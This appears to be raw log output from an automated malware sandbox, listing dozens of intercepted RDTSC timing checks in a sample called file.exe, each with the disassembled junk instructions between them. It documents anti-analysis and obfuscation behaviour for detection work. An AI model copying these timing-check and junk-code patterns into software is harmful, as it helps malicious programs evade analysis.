Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B567 second address: 129B571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B571 second address: 129B57B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C018Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B849 second address: 129B84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B84D second address: 129B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F67787C0195h 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B878 second address: 129B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B88D second address: 129B893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E868 second address: 129E86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E86C second address: 129E87B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E87B second address: 129E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E882 second address: 129E887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129E9B4 second address: 129E9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129ED52 second address: 129ED56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3035 second address: 12A303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A303A second address: 12A303F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A303F second address: 12A304D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6778CEBE46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A304D second address: 12A3063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F67787C018Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3063 second address: 12A3088 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6778CEBE46h 0x00000008 jnc 00007F6778CEBE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6778CEBE51h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A31D9 second address: 12A31F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3356 second address: 12A335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A335A second address: 12A335E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A335E second address: 12A3364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34C3 second address: 12A34E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F67787C0194h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34E6 second address: 12A34EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34EA second address: 12A34F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34F0 second address: 12A34F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A34F6 second address: 12A3513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 pushad 0x00000008 jp 00007F67787C0186h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3513 second address: 12A3519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A364E second address: 12A3656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3656 second address: 12A365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EC27 second address: 124EC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA4C second address: 124FA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA52 second address: 124FA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA56 second address: 124FA9D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movzx edx, dx 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F6778CEBE48h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov ecx, edi 0x0000002e nop 0x0000002f push ebx 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FA9D second address: 124FAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FAA1 second address: 124FAA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A7A second address: 12A3A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A83 second address: 12A3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A89 second address: 12A3A93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A93 second address: 12A3A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A3A99 second address: 12A3ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jnp 00007F67787C019Eh 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A456E second address: 12A45CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 jnc 00007F6778CEBE5Dh 0x00000017 pushad 0x00000018 jp 00007F6778CEBE46h 0x0000001e jng 00007F6778CEBE46h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b popad 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ABA18 second address: 12ABA3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F67787C0186h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F67787C0191h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ABA3A second address: 12ABA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ABA3E second address: 12ABA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F67787C018Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A9FB3 second address: 12A9FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA7E4 second address: 12AA7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAA9A second address: 12AAAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAAA0 second address: 12AAAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAAA6 second address: 12AAAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD6A second address: 12AAD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F67787C0186h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD75 second address: 12AAD7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD7A second address: 12AAD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AAD80 second address: 12AADB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE58h 0x00000009 jmp 00007F6778CEBE4Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F6778CEBE66h 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AB677 second address: 12AB683 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AB683 second address: 12AB6CB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnp 00007F6778CEBE52h 0x00000012 jne 00007F6778CEBE46h 0x00000018 jp 00007F6778CEBE46h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F6778CEBE4Eh 0x00000028 jbe 00007F6778CEBE58h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B0426 second address: 12B0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F67787C018Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B0442 second address: 12B0478 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE57h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AF985 second address: 12AF989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AF989 second address: 12AF98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFAEF second address: 12AFAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFAF3 second address: 12AFB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 jnc 00007F6778CEBE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F6778CEBE46h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFB13 second address: 12AFB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFECF second address: 12AFED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFED3 second address: 12AFEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AFEE2 second address: 12AFF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6778CEBE59h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B0029 second address: 12B002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B002D second address: 12B003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edx 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDBBF second address: 12BDBCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F67787C0186h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BBD59 second address: 12BBD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BBD5F second address: 12BBD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BC655 second address: 12BC659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BC659 second address: 12BC65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA2D second address: 12BCA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA33 second address: 12BCA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA37 second address: 12BCA82 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6778CEBE46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F6778CEBE53h 0x00000014 jmp 00007F6778CEBE4Ch 0x00000019 popad 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e popad 0x0000001f pushad 0x00000020 jg 00007F6778CEBE52h 0x00000026 jng 00007F6778CEBE46h 0x0000002c ja 00007F6778CEBE46h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA82 second address: 12BCA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BCA88 second address: 12BCAA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDA61 second address: 12BDA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDA67 second address: 12BDA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BDA74 second address: 12BDA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BB913 second address: 12BB919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12BB919 second address: 12BB91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C2E41 second address: 12C2E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C76FC second address: 12C7700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7700 second address: 12C7706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7706 second address: 12C7710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7307 second address: 12C7315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7315 second address: 12C731B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C731B second address: 12C7327 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12C7327 second address: 12C732C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83B4 second address: 12D83BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83BA second address: 12D83CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F67787C019Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83CB second address: 12D83D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12D83D1 second address: 12D83D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DBB95 second address: 12DBBA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DB870 second address: 12DB87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F67787C0186h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DB87E second address: 12DB887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12DB887 second address: 12DB88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
